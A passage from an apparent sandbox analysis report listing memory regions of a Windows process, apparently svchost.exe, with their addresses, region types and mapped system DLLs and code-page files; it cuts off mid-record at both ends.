entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 2256 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 2257 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2258 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2259 start_va = 0x3300000 end_va = 0x337ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2260 start_va = 0x3380000 end_va = 0x347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 2261 start_va = 0x3480000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2262 start_va = 0x3560000 end_va = 0x3566fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 2263 start_va = 0x3570000 end_va = 0x366ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 2264 start_va = 0x3670000 end_va = 0x376ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 2265 start_va = 0x3770000 end_va = 0x37effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 2266 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 2267 start_va = 0x3900000 end_va = 0x397ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 2268 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 2269 start_va = 0x3bc0000 end_va = 0x3bc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 2270 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 2271 start_va = 0x3d00000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 2272 start_va = 0x3d80000 end_va = 0x3e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 2273 start_va = 0x3e80000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 2274 start_va = 0x3f80000 end_va = 0x407ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f80000" filename = "" Region: id = 2275 start_va = 0x4180000 end_va = 0x427ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 2276 start_va = 0x4280000 end_va = 0x437ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004280000" filename = "" Region: id = 2277 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 2278 start_va = 0x4630000 end_va = 0x4636fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 2279 start_va = 0x4640000 end_va = 0x473ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 2280 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 2281 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 2282 start_va = 0x4a00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 2283 start_va = 0x4b00000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 2284 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 2285 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 2286 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 2287 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 2288 start_va = 0x50f0000 end_va = 0x50f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 2289 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 2290 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 2291 start_va = 0x5300000 end_va = 0x5300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005300000" filename = "" Region: id = 2292 start_va = 0x5400000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 2293 start_va = 0x5500000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 2294 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 2295 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 2296 start_va = 0x5800000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 2297 start_va = 0x5900000 end_va = 0x59fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 2298 start_va = 0x5a40000 end_va = 0x5a46fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a40000" filename = "" Region: id = 2299 start_va = 0x5a50000 end_va = 0x5a50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 2300 start_va = 0x5a60000 end_va = 0x5a60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a60000" filename = "" Region: id = 2301 start_va = 0x5a70000 end_va = 0x5a7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 2302 start_va = 0x5a90000 end_va = 0x5aa0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 2303 start_va = 0x5ab0000 end_va = 0x5ac0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 2304 start_va = 0x5ad0000 end_va = 0x5ae0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 2305 start_va = 0x5b00000 end_va = 0x5bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 2306 start_va = 0x5e00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 2307 start_va = 0x5f00000 end_va = 0x5f10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 2308 start_va = 0x5f20000 end_va = 0x5f30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 2309 start_va = 0x5f40000 end_va = 0x5f50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 2310 start_va = 0x5f60000 end_va = 0x5f70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 2311 start_va = 0x5f80000 end_va = 0x5fa7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 2312 start_va = 0x5fc0000 end_va = 0x5fc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 2313 start_va = 0x5fd0000 end_va = 0x60cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fd0000" filename = "" Region: id = 2314 start_va = 0x60d0000 end_va = 0x60e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 2315 start_va = 0x6100000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 2316 start_va = 0x6200000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 2317 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 2318 start_va = 0x6400000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 2319 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 2320 start_va = 0x6600000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 2321 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 2322 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 2323 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 2324 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 2325 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 2326 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 2327 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 2328 start_va = 0x6f00000 end_va = 0x6f01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006f00000" filename = "" Region: id = 2329 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 2330 start_va = 0x7130000 end_va = 0x717efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007130000" filename = "" Region: id = 2331 start_va = 0x7200000 end_va = 0x7230fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 2332 start_va = 0x7240000 end_va = 0x7250fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 2333 start_va = 0x7260000 end_va = 0x7290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 2334 start_va = 0x72a0000 end_va = 0x72d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 2335 start_va = 0x72e0000 end_va = 0x73dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072e0000" filename = "" Region: id = 2336 start_va = 0x7600000 end_va = 0x76fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007600000" filename = "" Region: id = 2337 start_va = 0x7830000 end_va = 0x792ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007830000" filename = "" Region: id = 2338 start_va = 0x7a30000 end_va = 0x7b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a30000" filename = "" Region: id = 2339 start_va = 0x7b30000 end_va = 0x7c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b30000" filename = "" Region: id = 2340 start_va = 0x7d30000 end_va = 0x7e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d30000" filename = "" Region: id = 2341 start_va = 0x8000000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 2342 start_va = 0x8430000 end_va = 0x852ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008430000" filename = "" Region: id = 2343 start_va = 0x8630000 end_va = 0x872ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008630000" filename = "" Region: id = 2344 start_va = 0x8c30000 end_va = 0x8d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c30000" filename = "" Region: id = 2345 start_va = 0x8f30000 end_va = 0x902ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f30000" filename = "" Region: id = 2346 start_va = 0x9030000 end_va = 0x912ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009030000" filename = "" Region: id = 2347 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2348 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2349 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2350 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2351 start_va = 0x7ff60e670000 end_va = 0x7ff60e67cfff monitored = 0 entry_point = 0x7ff60e673980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2352 start_va = 0x7ffc414f0000 end_va = 0x7ffc41533fff monitored = 0 entry_point = 0x7ffc415183e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 2353 start_va = 0x7ffc41610000 end_va = 0x7ffc418bffff monitored = 0 entry_point = 0x7ffc41611cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 2354 start_va = 0x7ffc43150000 end_va = 0x7ffc43166fff monitored = 0 entry_point = 0x7ffc43157520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 2355 start_va = 0x7ffc433d0000 end_va = 0x7ffc4340efff monitored = 0 entry_point = 0x7ffc433f82d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 2356 start_va = 0x7ffc43480000 end_va = 0x7ffc434dcfff monitored = 0 entry_point = 0x7ffc434ae510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 2357 start_va = 0x7ffc43550000 end_va = 0x7ffc43567fff monitored = 0 entry_point = 0x7ffc4355b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 2358 start_va = 0x7ffc44560000 end_va = 0x7ffc44570fff monitored = 0 entry_point = 0x7ffc445628d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 2359 start_va = 0x7ffc44630000 end_va = 0x7ffc44661fff monitored = 0 entry_point = 0x7ffc4463b0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 2360 start_va = 0x7ffc44700000 end_va = 0x7ffc44717fff monitored = 0 entry_point = 0x7ffc44701b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 2361 start_va = 0x7ffc447a0000 end_va = 0x7ffc448aefff monitored = 0 entry_point = 0x7ffc447dc010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 2362 start_va = 0x7ffc44aa0000 end_va = 0x7ffc44ab7fff monitored = 0 entry_point = 0x7ffc44aa4290 region_type = mapped_file name = "elscore.dll" filename = "\\Windows\\System32\\ELSCore.dll" (normalized: "c:\\windows\\system32\\elscore.dll") Region: id = 2363 start_va = 0x7ffc44ae0000 end_va = 0x7ffc44b31fff monitored = 0 entry_point = 0x7ffc44ae3d30 region_type = mapped_file name = "cryptngc.dll" filename = "\\Windows\\System32\\cryptngc.dll" (normalized: "c:\\windows\\system32\\cryptngc.dll") Region: id = 2364 start_va = 0x7ffc44b40000 end_va = 0x7ffc44b5cfff monitored = 0 entry_point = 0x7ffc44b44f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 2365 start_va = 0x7ffc44b60000 end_va = 0x7ffc44d5ffff monitored = 0 entry_point = 0x7ffc44bd5240 region_type = mapped_file name = "wlidsvc.dll" filename = "\\Windows\\System32\\wlidsvc.dll" (normalized: "c:\\windows\\system32\\wlidsvc.dll") Region: id = 2366 start_va = 0x7ffc45fc0000 end_va = 0x7ffc46005fff monitored = 0 entry_point = 0x7ffc45fc79a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 2367 start_va = 0x7ffc46010000 end_va = 0x7ffc46076fff monitored = 0 entry_point = 0x7ffc4601b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 2368 start_va = 0x7ffc46130000 end_va = 0x7ffc4624cfff monitored = 0 entry_point = 0x7ffc4615fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 2369 start_va = 0x7ffc470c0000 end_va = 0x7ffc470d1fff monitored = 0 entry_point = 0x7ffc470c1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 2370 start_va = 0x7ffc47160000 end_va = 0x7ffc47167fff monitored = 0 entry_point = 0x7ffc471613b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 2371 start_va = 0x7ffc4a270000 end_va = 0x7ffc4a283fff monitored = 0 entry_point = 0x7ffc4a272a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 2372 start_va = 0x7ffc4bc20000 end_va = 0x7ffc4bc4efff monitored = 0 entry_point = 0x7ffc4bc2ec60 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 2373 start_va = 0x7ffc4bc90000 end_va = 0x7ffc4bcc5fff monitored = 0 entry_point = 0x7ffc4bc927f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 2374 start_va = 0x7ffc4bd50000 end_va = 0x7ffc4bd63fff monitored = 0 entry_point = 0x7ffc4bd53710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 2375 start_va = 0x7ffc4bd70000 end_va = 0x7ffc4bd97fff monitored = 0 entry_point = 0x7ffc4bd7efc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 2376 start_va = 0x7ffc4be00000 end_va = 0x7ffc4be1dfff monitored = 0 entry_point = 0x7ffc4be0ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 2377 start_va = 0x7ffc4be20000 end_va = 0x7ffc4be35fff monitored = 0 entry_point = 0x7ffc4be21af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 2378 start_va = 0x7ffc4be40000 end_va = 0x7ffc4be59fff monitored = 0 entry_point = 0x7ffc4be42330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 2379 start_va = 0x7ffc4be60000 end_va = 0x7ffc4be6cfff monitored = 0 entry_point = 0x7ffc4be61420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 2380 start_va = 0x7ffc4c140000 end_va = 0x7ffc4c1c3fff monitored = 0 entry_point = 0x7ffc4c158d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 2381 start_va = 0x7ffc4c1d0000 end_va = 0x7ffc4c1e5fff monitored = 0 entry_point = 0x7ffc4c1d55e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2382 start_va = 0x7ffc4c1f0000 end_va = 0x7ffc4c2c5fff monitored = 0 entry_point = 0x7ffc4c21a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 2383 start_va = 0x7ffc4c2d0000 end_va = 0x7ffc4c333fff monitored = 0 entry_point = 0x7ffc4c2ebed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 2384 start_va = 0x7ffc4c340000 end_va = 0x7ffc4c364fff monitored = 0 entry_point = 0x7ffc4c349900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2385 start_va = 0x7ffc4c370000 end_va = 0x7ffc4c383fff monitored = 0 entry_point = 0x7ffc4c371800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2386 start_va = 0x7ffc4c390000 end_va = 0x7ffc4c485fff monitored = 0 entry_point = 0x7ffc4c3c9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2387 start_va = 0x7ffc4c490000 end_va = 0x7ffc4c503fff monitored = 0 entry_point = 0x7ffc4c4a5eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2388 start_va = 0x7ffc4c510000 end_va = 0x7ffc4c646fff monitored = 0 entry_point = 0x7ffc4c550480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 2389 start_va = 0x7ffc4c650000 end_va = 0x7ffc4c65efff monitored = 0 entry_point = 0x7ffc4c654960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 2390 start_va = 0x7ffc4c680000 end_va = 0x7ffc4c8f9fff monitored = 0 entry_point = 0x7ffc4c69a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 2391 start_va = 0x7ffc4c9c0000 end_va = 0x7ffc4c9cffff monitored = 0 entry_point = 0x7ffc4c9c1690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 2392 start_va = 0x7ffc4cc10000 end_va = 0x7ffc4cc20fff monitored = 0 entry_point = 0x7ffc4cc17480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 2393 start_va = 0x7ffc4dbb0000 end_va = 0x7ffc4dbc0fff monitored = 0 entry_point = 0x7ffc4dbb2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2394 start_va = 0x7ffc4dbd0000 end_va = 0x7ffc4dbedfff monitored = 0 entry_point = 0x7ffc4dbd3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2395 start_va = 0x7ffc4dbf0000 end_va = 0x7ffc4dc71fff monitored = 0 entry_point = 0x7ffc4dbf2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2396 start_va = 0x7ffc4dcd0000 end_va = 0x7ffc4dd0ffff monitored = 0 entry_point = 0x7ffc4dcdcbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 2397 start_va = 0x7ffc4dd10000 end_va = 0x7ffc4dd56fff monitored = 0 entry_point = 0x7ffc4dd11d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 2398 start_va = 0x7ffc4dd60000 end_va = 0x7ffc4dda1fff monitored = 0 entry_point = 0x7ffc4dd63670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 2399 start_va = 0x7ffc4ddd0000 end_va = 0x7ffc4ddf1fff monitored = 0 entry_point = 0x7ffc4dde2540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 2400 start_va = 0x7ffc4de00000 end_va = 0x7ffc4ded4fff monitored = 0 entry_point = 0x7ffc4de1cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 2401 start_va = 0x7ffc4dfc0000 end_va = 0x7ffc4dffffff monitored = 0 entry_point = 0x7ffc4dfd6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: 